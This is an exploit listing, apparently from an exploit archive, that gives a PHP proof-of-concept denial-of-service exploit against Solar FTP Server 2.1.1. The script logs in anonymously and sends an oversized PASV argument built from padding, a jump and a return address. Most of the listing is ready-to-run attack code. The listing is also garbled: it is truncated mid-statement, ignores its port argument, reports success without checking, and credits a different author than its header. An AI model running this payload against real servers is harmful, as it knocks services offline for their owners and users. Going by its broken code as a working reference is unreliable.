=============================================================================================================================================
| # Title : Solar FTP Server 2.1.1 PASV Command - Denial of Service vulnerability |
| # Author : indoushka |
| # Tested on : Windows 10 Fr (Pro) / browser : Mozilla Firefox 136.0.0 (64 bits) |
| # Vendor : https://www.exploit-db.com/apps/b604f672086663c6c97bfe0f10156f19-solarftps-setup.exe |
=============================================================================================================================================
POC :
[+] Dorking in Google or other search engine.
[+] Code Description: Solar FTP Server version 2.1.1 remote denial of service exploit.
[+] Save code as poc.php.
[+] Usage = C:\www>php 2.php 127.0.0.1 21
[+] Note : this copy of the listing is truncated; the opening PHP tag and the start of the argument check are missing, so the code below begins mid-statement. In the visible code the second command-line argument is stored in $platform and never used (the connection always goes to port 21), and the final "Done - Exploited" message is printed without checking the server's state.
[+] Payload :
\n"; exit(0); } $ip = $argv[1]; if ($argc > 2) { $platform = $argv[2]; } $ret = pack('L', 0x7C9572D8); $padding = str_repeat("\x43", 468); $junk = str_repeat("\x43", 1532); $frontpad = str_repeat("\x41", 100) . "\xEB\x30" . str_repeat("\x41", 21); $payload = $frontpad . $ret . $padding . $junk; echo "[+] Solar FTP 2.1.1 PASV - Denial of Service - DoS\n[+] Author: Fernando Mengali\n"; echo "[+] Connecting to $ip\n"; $socket = fsockopen($ip, 21, $errno, $errstr, 30); if (!$socket) { echo "[-] Connection to $ip failed!\n"; exit(0); } echo "[+] Exploiting\n"; echo "[*] Sending payload to command PASV...\n"; fwrite($socket, "USER anon\r\n"); fread($socket, 1024); fwrite($socket, "PASS anon\r\n"); fread($socket, 1024); fwrite($socket, "PASV " . $payload . "\r\n"); echo "[+] Done - Exploited\n"; fclose($socket); ?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================